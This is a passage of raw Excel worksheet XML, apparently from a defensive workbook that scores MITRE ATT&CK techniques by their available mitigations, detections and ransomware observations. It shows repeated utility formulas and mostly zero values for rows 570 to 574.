        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M570" s="25">
        <v>0</v>
      </c>
      <c r="N570" s="51">
        <v>0</v>
      </c>
      <c r="O570" s="51">
        <v>0</v>
      </c>
      <c r="P570" s="51">
        <v>0</v>
      </c>
      <c r="Q570" s="51">
        <v>0</v>
      </c>
      <c r="R570" s="51"/>
      <c r="S570" s="51">
        <v>0</v>
      </c>
      <c r="T570" s="51"/>
      <c r="U570" s="51">
        <v>0</v>
      </c>
      <c r="V570" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W570">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X570">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y570">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z570">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA570">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB570">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC570" s="29"/>
      <c r="AD570" s="25" t="str" cm="1">
        <f t="array" ref="AD570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE570" s="25">
        <f>IF(AD570="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF570" s="25" t="str" cm="1">
        <f t="array" ref="AF570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG570" s="25">
        <f>IF(AF570="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH570" s="25" t="str" cm="1">
        <f t="array" ref="AH570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI570" s="25">
        <f>IF(AH570="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ570" s="25" t="str" cm="1">
        <f t="array" ref="AJ570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK570" s="25">
        <f>IF(AJ570="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL570" s="25" t="str" cm="1">
        <f t="array" ref="AL570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM570" s="25">
        <f>IF(AL570="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN570" s="60">
        <v>0</v>
      </c>
      <c r="AO570" s="51">
        <v>0</v>
      </c>
      <c r="AP570" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ570" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR570" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS570" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT570" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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71" spans="1:47">
      <c r="A571" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B571" s="25">
        <f>SUM(H571,M571,V571)*(1+SUM(AE571,AG571,AI571,AK571,AM571))</f>
        <v>0.05</v>
      </c>
      <c r="C571" s="25" t="s">
        <v>1950</v>
      </c>
      <c r="D571" s="25" t="s">
        <v>1708</v>
      </c>
      <c r="E571" s="25" t="s">
        <v>1951</v>
      </c>
      <c r="F571" s="51">
        <v>0</v>
      </c>
      <c r="G571" s="51">
        <v>1</v>
      </c>
      <c r="H571" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I571">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J571">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K571">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L571">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M571" s="25">
        <v>0</v>
      </c>
      <c r="N571" s="51">
        <v>0</v>
      </c>
      <c r="O571" s="51">
        <v>0</v>
      </c>
      <c r="P571" s="51">
        <v>0</v>
      </c>
      <c r="Q571" s="51">
        <v>0</v>
      </c>
      <c r="R571" s="51"/>
      <c r="S571" s="51">
        <v>0</v>
      </c>
      <c r="T571" s="51"/>
      <c r="U571" s="51">
        <v>0</v>
      </c>
      <c r="V571" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W571">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X571">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y571">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z571">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA571">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB571">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC571" s="29"/>
      <c r="AD571" s="25" t="str" cm="1">
        <f t="array" ref="AD571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE571" s="25">
        <f>IF(AD571="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF571" s="25" t="str" cm="1">
        <f t="array" ref="AF571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG571" s="25">
        <f>IF(AF571="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH571" s="25" t="str" cm="1">
        <f t="array" ref="AH571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI571" s="25">
        <f>IF(AH571="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ571" s="25" t="str" cm="1">
        <f t="array" ref="AJ571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK571" s="25">
        <f>IF(AJ571="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL571" s="25" t="str" cm="1">
        <f t="array" ref="AL571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM571" s="25">
        <f>IF(AL571="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN571" s="52">
        <v>0</v>
      </c>
      <c r="AO571" s="51">
        <v>0</v>
      </c>
      <c r="AP571" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ571" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR571" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS571" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT571" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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72" spans="1:47">
      <c r="A572" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B572" s="25">
        <f>SUM(H572,M572,V572)*(1+SUM(AE572,AG572,AI572,AK572,AM572))</f>
        <v>0.05</v>
      </c>
      <c r="C572" s="25" t="s">
        <v>1952</v>
      </c>
      <c r="D572" s="25" t="s">
        <v>1609</v>
      </c>
      <c r="E572" s="25" t="s">
        <v>1953</v>
      </c>
      <c r="F572" s="51">
        <v>0</v>
      </c>
      <c r="G572" s="51">
        <v>1</v>
      </c>
      <c r="H572" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I572">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J572">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K572">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L572">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M572" s="25">
        <v>0</v>
      </c>
      <c r="N572" s="51">
        <v>0</v>
      </c>
      <c r="O572" s="51">
        <v>0</v>
      </c>
      <c r="P572" s="51">
        <v>0</v>
      </c>
      <c r="Q572" s="51">
        <v>0</v>
      </c>
      <c r="R572" s="51"/>
      <c r="S572" s="51">
        <v>0</v>
      </c>
      <c r="T572" s="51"/>
      <c r="U572" s="51">
        <v>0</v>
      </c>
      <c r="V572" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W572">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X572">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y572">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z572">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA572">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB572">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC572" s="29"/>
      <c r="AD572" s="25" t="str" cm="1">
        <f t="array" ref="AD572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE572" s="25">
        <f>IF(AD572="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF572" s="25" t="str" cm="1">
        <f t="array" ref="AF572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG572" s="25">
        <f>IF(AF572="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH572" s="25" t="str" cm="1">
        <f t="array" ref="AH572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI572" s="25">
        <f>IF(AH572="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ572" s="25" t="str" cm="1">
        <f t="array" ref="AJ572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK572" s="25">
        <f>IF(AJ572="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL572" s="25" t="str" cm="1">
        <f t="array" ref="AL572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM572" s="25">
        <f>IF(AL572="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN572" s="60">
        <v>0</v>
      </c>
      <c r="AO572" s="51">
        <v>0</v>
      </c>
      <c r="AP572" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ572" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR572" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS572" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT572" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU572"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73" spans="1:47">
      <c r="A573" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B573" s="25">
        <f>SUM(H573,M573,V573)*(1+SUM(AE573,AG573,AI573,AK573,AM573))</f>
        <v>0.05</v>
      </c>
      <c r="C573" s="25" t="s">
        <v>1954</v>
      </c>
      <c r="D573" s="25" t="s">
        <v>1609</v>
      </c>
      <c r="E573" s="25" t="s">
        <v>1955</v>
      </c>
      <c r="F573" s="51">
        <v>0</v>
      </c>
      <c r="G573" s="51">
        <v>1</v>
      </c>
      <c r="H573" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I573">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J573">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K573">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L573">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M573" s="25">
        <v>0</v>
      </c>
      <c r="N573" s="51">
        <v>0</v>
      </c>
      <c r="O573" s="51">
        <v>0</v>
      </c>
      <c r="P573" s="51">
        <v>0</v>
      </c>
      <c r="Q573" s="51">
        <v>0</v>
      </c>
      <c r="R573" s="51"/>
      <c r="S573" s="51">
        <v>0</v>
      </c>
      <c r="T573" s="51"/>
      <c r="U573" s="51">
        <v>0</v>
      </c>
      <c r="V573" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W573">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X573">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y573">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z573">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA573">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB573">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC573" s="29"/>
      <c r="AD573" s="25" t="str" cm="1">
        <f t="array" ref="AD573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE573" s="25">
        <f>IF(AD573="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF573" s="25" t="str" cm="1">
        <f t="array" ref="AF573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG573" s="25">
        <f>IF(AF573="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH573" s="25" t="str" cm="1">
        <f t="array" ref="AH573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI573" s="25">
        <f>IF(AH573="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ573" s="25" t="str" cm="1">
        <f t="array" ref="AJ573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK573" s="25">
        <f>IF(AJ573="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL573" s="25" t="str" cm="1">
        <f t="array" ref="AL573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM573" s="25">
        <f>IF(AL573="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN573" s="60">
        <v>0</v>
      </c>
      <c r="AO573" s="51">
        <v>0</v>
      </c>
      <c r="AP573" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ573" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR573" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS573" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT573" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU573"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74" spans="1:47">
      <c r="A574" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B574" s="25">
        <f>SUM(H574,M574,V574)*(1+SUM(AE574,AG574,AI574,AK574,AM574))</f>
        <v>0.05</v>
      </c>
      <c r="C574" s="25" t="s">
        <v>1956</v>
      </c>
      <c r="D574" s="25" t="s">
        <v>1957</v>
      </c>
      <c r="E574" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F574" s="51">
        <v>0</v>
      </c>
      <c r="G574" s="51">
        <v>1</v>
      </c>
      <c r="H574" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I574">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J574">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K574">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L574">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M574" s="25">
        <v>0</v>
      </c>
      <c r="N574" s="51">
        <v>0</v>
      </c>
      <c r="O574" s="51">
        <v>0</v>
      </c>
      <c r="P574" s="51">
        <v>0</v>
      </c>
      <c r="Q574" s="51">
        <v>0</v>
      </c>
      <c r="R574" s="51"/>
      <c r="S574" s="51">
        <v>0</v>
      </c>
      <c r="T574" s="51"/>
      <c r="U574" s="51">
        <v>0</v>
      </c>
      <c r="V574" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W574">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X574">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y574">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z574">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA574">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB574">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC574" s="29"/>
      <c r="AD574" s="25" t="str" cm="1">
        <f t="array" ref="AD574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE574" s="25">
        <f>IF(AD574="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF574" s="25" t="str" cm="1">
        <f t="array" ref="AF574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG574" s="25">
        <f>IF(AF574="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH574" s="25" t="str" cm="1">
